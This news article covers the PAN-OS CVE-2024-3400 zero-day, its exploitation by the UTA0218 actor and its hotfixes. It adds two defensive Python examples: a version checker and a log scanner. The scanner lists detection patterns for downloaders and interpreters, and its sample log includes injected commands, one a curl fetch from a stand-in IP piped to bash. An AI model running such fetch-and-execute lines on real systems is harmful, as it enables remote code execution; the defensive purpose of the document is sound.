Palo Alto Networks (PAN) on April 14 released hotfixes to address a high-severity zero-day bug in multiple versions of its PAN-OS software that a threat actor is using to deploy a new Python backdoor on affected firewalls.
The flaw, tracked as CVE-2024-3400, is present in PAN-OS 10.2, 11.0, and 11.1 firewalls when the GlobalProtect gateway and device telemetry features are both enabled. PAN disclosed the flaw on April 12 after researchers from Volexity found it while investigating suspicious activity on a customer's firewall.
Limited attack
PAN described attacks targeting the flaw as low in volume and attributed the attack activity to a single threat cluster that the company is tracking as “Operation Midnight Eclipse.” However, the vendor did not rule out the possibility that other attackers could also exploit the flaw.
When PAN disclosed the flaw last week, it recommended temporary measures customers could take to mitigate the threat, including disabling device telemetry. On April 14, the company made hotfix releases available as PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, and PAN-OS 11.1.2-h3; all later PAN-OS versions also contain the fix. The security vendor urged customers to apply the updates and promised similar hotfixes for other maintenance releases of the software.
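Deciding whether a given firewall is covered by those hotfixes, and what to do if it is not, is easy to get wrong because PAN-OS versions carry a hotfix suffix (`-h1`) that a plain string compare mishandles. The following is an added example, not PAN's tooling: it parses PAN-OS version strings, compares them within their release train against the three hotfixes named above, and returns the action the article's guidance implies. It only knows the hotfixes listed on this page as of April 14; PAN promised further hotfixes for other maintenance releases, so a "vulnerable" result for a version the vendor has since patched is this example's limitation, and the advisory remains authoritative. The function and status names are this example's own.

```python
import re
from typing import Dict, Tuple

# Hotfix releases named in PAN's April 14 update, keyed by release train
# (major, minor) -> (maintenance, hotfix). Assumption of this example: later
# hotfixes PAN promised for other maintenance releases are NOT listed here.
FIXED_HOTFIXES: Dict[Tuple[int, int], Tuple[int, int]] = {
    (10, 2): (9, 1),   # PAN-OS 10.2.9-h1
    (11, 0): (4, 1),   # PAN-OS 11.0.4-h1
    (11, 1): (2, 3),   # PAN-OS 11.1.2-h3
}

# e.g. "10.2.9-h1" -> major=10 minor=2 maint=9 hotfix=1; "11.1.3" -> hotfix=0
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_panos_version(version: str) -> Tuple[int, int, int, int]:
    """Split a PAN-OS version string into comparable integers."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version string: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


def cve_2024_3400_status(version: str) -> str:
    """Return 'fixed', 'vulnerable', or 'outside-affected-trains'.

    Comparison is done within the release train: 10.2.10 is newer than
    10.2.9-h1, but 11.0.4 (no hotfix) is older than 11.0.4-h1.
    """
    major, minor, maint, hotfix = parse_panos_version(version)
    train = (major, minor)
    if train not in FIXED_HOTFIXES:
        # The article lists only the 10.2, 11.0 and 11.1 trains as affected.
        return "outside-affected-trains"
    if (maint, hotfix) >= FIXED_HOTFIXES[train]:
        return "fixed"
    return "vulnerable"  # unless a later vendor hotfix for this release applies


def recommended_action(version: str, gp_gateway_enabled: bool, telemetry_enabled: bool) -> str:
    """Map the device's state to the mitigation path the vendor guidance describes.

    The bug needs the GlobalProtect gateway and device telemetry to be enabled;
    the interim mitigation is to disable telemetry, then upgrade and re-enable it.
    """
    status = cve_2024_3400_status(version)
    if status in ("fixed", "outside-affected-trains"):
        return "no-action"
    if not gp_gateway_enabled:
        return "upgrade"  # not currently exploitable, but still unpatched
    if telemetry_enabled:
        return "disable-telemetry-then-upgrade"
    return "upgrade-then-re-enable-telemetry"


if __name__ == "__main__":
    # Constructed inventory for demonstration; not real device data.
    fleet = [("fw-dc1", "10.2.9", True, True), ("fw-branch", "11.1.3", True, True),
             ("fw-lab", "11.0.4", False, True), ("fw-old", "10.1.11", True, True)]
    for name, ver, gp, tel in fleet:
        print(f"{name:10} {ver:10} {cve_2024_3400_status(ver):24} {recommended_action(ver, gp, tel)}")
```

Run it against an exported inventory and feed the "disable-telemetry-then-upgrade" rows to whoever owns the change window first; those are the devices exposed to the exploit path described in the article.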
Reports of attackers targeting the flaw before a patch was available prompted the US Cybersecurity and Infrastructure Security Agency (CISA) last week to quickly add CVE-2024-3400 to its Known Exploited Vulnerabilities (KEV) catalog. Civilian federal agencies have until April 19 to remediate the issue. CISA has previously warned organizations on multiple occasions about threat actors' strong interest in VPNs and other remote access technologies from vendors such as Pulse Secure, Cisco, and PAN, because of the privileged access these devices provide to corporate networks and data.
Maximum-severity command injection flaw
In a blog post last week, Volexity described the discovered flaw as a command injection vulnerability in PAN-OS GlobalProtect that provided remote unauthenticated attackers with a way to execute arbitrary code on affected systems. The security vendor said it observed an attacker, which it is tracking as UTA0218, exploit the flaw to create a reverse shell and download additional malware onto compromised systems.
“The attacker focused on exporting configuration data from devices, then using it as an entry point to move laterally into victim organizations,” Volexity said.
One of the additional tools the threat actor deployed on compromised systems was a new Python backdoor that Volexity calls Upstyle. The security vendor said the threat actor used the Upstyle backdoor to execute a number of additional commands, including ones for lateral movement within a target network and for stealing credentials and other sensitive data from it.
“The cunning and speed employed by the attacker suggests that this is a highly capable actor with a clear agenda of what to access to achieve their goals,” Volexity warned. Volexity said it was unable to determine the exact scope of the exploit activity, but speculated that it was likely limited and targeted. The company said it found evidence of UTA0218 attempting to exploit the vulnerability in multiple organizations on March 26 and 27.
PAN said its analysis showed that the threat actor uses the backdoor to execute a handful of commands on vulnerable firewalls. The commands included one to copy configuration files and extract them via HTTP requests and another that configured the firewall to receive even more commands, this time from a different URL. “Finally, the threat actors cleaned up by removing all files associated with the backdoors and deleting their cronjobs,” PAN said.
Complete control
Karl Sigler, senior manager of security research at Trustwave’s SpiderLabs, says that exploiting CVE-2024-3400 would give an attacker complete control over the PAN device. “This could give the attacker a foothold to further navigate within the organization,” he says. “It could also allow the attacker to disable protections provided by the device, including disabling access control lists and VPN connections.”
Sigler says the exploit in this case works by causing an affected device to write operating system commands into an error log. Those logged commands are then processed and executed with root-level permissions, he says. “Disabling device telemetry disables the log file, short-circuiting the attack,” Sigler notes. “The main risk in doing so is that network administrators often rely on this telemetry to troubleshoot problems with the device. Additionally, monitoring for anomalous network behavior could be evidence of an attack in progress. Disabling telemetry could hinder such efforts.”
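Because the attack path described above turns a log file into a command queue, the log itself is also where the injected payload is visible. The script below is an added example, not PAN's or Volexity's detection content: it scans error-log lines for text that looks like a shell command rather than a normal field value (command substitution, pipe or semicolon chaining, downloaders, interpreters, base64 decoding, temp-directory paths). The log format and the sample lines are constructed for this example, and the heuristics are this example's own rather than any published indicators, so tune them to your own log format before relying on them.

```python
import re
from typing import Dict, List

# Heuristic patterns for an OS command smuggled into a logged field. These are
# this example's own assumptions, not vendor-published indicators of compromise.
SUSPICIOUS_PATTERNS = {
    "command-substitution": re.compile(r"\$\([^)]*\)|`[^`]*`"),
    "shell-chaining": re.compile(r"(?:;|\|\||&&|\|)\s*[A-Za-z/]"),
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "interpreter": re.compile(r"\b(?:bash|sh|python3?|perl)\s+-c\b|\bpython3?\b"),
    "decoder": re.compile(r"\bbase64\s+(?:-d|--decode)\b"),
    "tmp-path": re.compile(r"/(?:tmp|dev/shm)/[\w./-]+"),
}

# Constructed sample error log in a hypothetical format; the IPs are
# documentation ranges (RFC 5737). Lines 3 and 4 carry injected commands.
SAMPLE_ERROR_LOG = [
    "2024-04-12T03:11:02 gpsvc: user 'alice' authenticated from 198.51.100.10",
    "2024-04-12T03:11:09 gpsvc: request rejected, invalid parameter value 'x9Qa3'",
    "2024-04-12T03:11:15 gpsvc: request rejected, invalid parameter value '`curl http://192.0.2.5/p.sh|bash`'",
    "2024-04-12T03:11:21 gpsvc: request rejected, invalid parameter value '$(python3 /tmp/u.py)'",
    "2024-04-12T03:12:00 gpsvc: certificate check OK for gateway gp-gw1",
]


def classify_log_line(line: str) -> List[str]:
    """Return the names of every heuristic that matches the line (empty if clean)."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(line)]


def scan_error_log(lines) -> List[Dict]:
    """Walk a log and report each line that looks like it carries a shell command."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        reasons = classify_log_line(line)
        if reasons:
            hits.append({"line_no": line_no, "reasons": reasons, "text": line.rstrip()})
    return hits


if __name__ == "__main__":
    for hit in scan_error_log(SAMPLE_ERROR_LOG):
        print(f"line {hit['line_no']}: {', '.join(hit['reasons'])}")
        print(f"    {hit['text']}")
```

A hit on the error log is worth treating as a priority alert rather than a curiosity: on an unpatched device with telemetry enabled, the same text the scanner matched is what the firewall went on to execute as root, so the next step is to confirm the version, check for the follow-on artifacts the article describes (cron jobs, dropped files, configuration exfiltration), and preserve the log before any cleanup by the attacker or an upgrade overwrites it.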
Palo Alto itself recommended that organizations that are unable to immediately update their software for any reason disable device telemetry until they are able to update. According to the company, “Once updated, device telemetry should be re-enabled on your device.”